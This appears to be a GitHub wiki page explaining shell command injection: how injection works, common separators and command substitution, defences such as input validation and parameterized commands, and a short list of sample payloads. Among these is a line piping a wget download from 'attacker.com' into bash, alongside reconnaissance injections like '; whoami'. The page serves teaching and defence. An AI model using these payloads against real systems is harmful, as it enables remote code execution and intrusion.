info ‐ Shell Command Injection - taylorjohn/hacking GitHub Wiki

Shell Command Injection

Shell command injection is a security vulnerability that occurs when an application incorporates user-supplied input into shell commands without proper validation or sanitization. This vulnerability can allow attackers to execute arbitrary commands on the underlying operating system. Shell command injection is a prevalent issue in web applications, especially those that interact with the system shell to perform tasks such as executing external programs or managing files.

Description

In shell command injection, attackers exploit weaknesses in the handling of user input by the application. By injecting malicious commands into input fields or parameters that are subsequently passed to the shell for execution, attackers can execute arbitrary commands with the privileges of the vulnerable application.

How to Inject

Attackers inject malicious shell commands into vulnerable input fields or parameters by appending them to legitimate input data. Common injection techniques include:

Using Special Characters: Attackers may use special characters such as semicolons (;), pipes (|), ampersands (&), backticks (\``), and redirection operators (>, <`) to separate legitimate commands and inject malicious ones.
Command Substitution: Attackers may leverage command substitution to execute commands within other commands. This is typically achieved using backticks or $().
File Inclusion: If the application includes file paths or filenames as part of shell commands, attackers may manipulate these inputs to execute arbitrary commands stored within files.

How to Protect

To protect against shell command injection vulnerabilities, developers should implement the following security measures:

Input Validation: Validate and sanitize all user-supplied input to ensure that it adheres to expected formats and does not contain malicious characters or commands.
Parameterized Commands: Use parameterized commands or APIs provided by programming frameworks to interact with the underlying system. Avoid constructing shell commands by concatenating user input.
Whitelisting: Define and enforce a whitelist of allowed characters or commands for input fields. Reject any input that does not conform to the whitelist.
Least Privilege: Run the application with the least privilege necessary to perform its functions. Avoid running the application with elevated privileges that could exacerbate the impact of successful attacks.

Examples of Command Injection

List Files in Directory:
- Description: Executes the ls command to list files in the current directory.
- Command: ; ls -la
Access Root Directory:
- Description: Changes the current directory to the root directory.
- Command: && cd /
Download and Execute Malicious Script:
- Description: Downloads and executes a malicious script from a remote server.
- Command: | wget http://attacker.com/malicious.sh | bash
Display Current User:
- Description: Retrieves the username of the current user.
- Command: ; whoami
Display System Information:
- Description: Displays information about the underlying operating system.
- Command: | uname -a

By understanding the risks associated with shell command injection and implementing robust security measures, developers can mitigate the risk of exploitation and protect their applications from unauthorized command execution.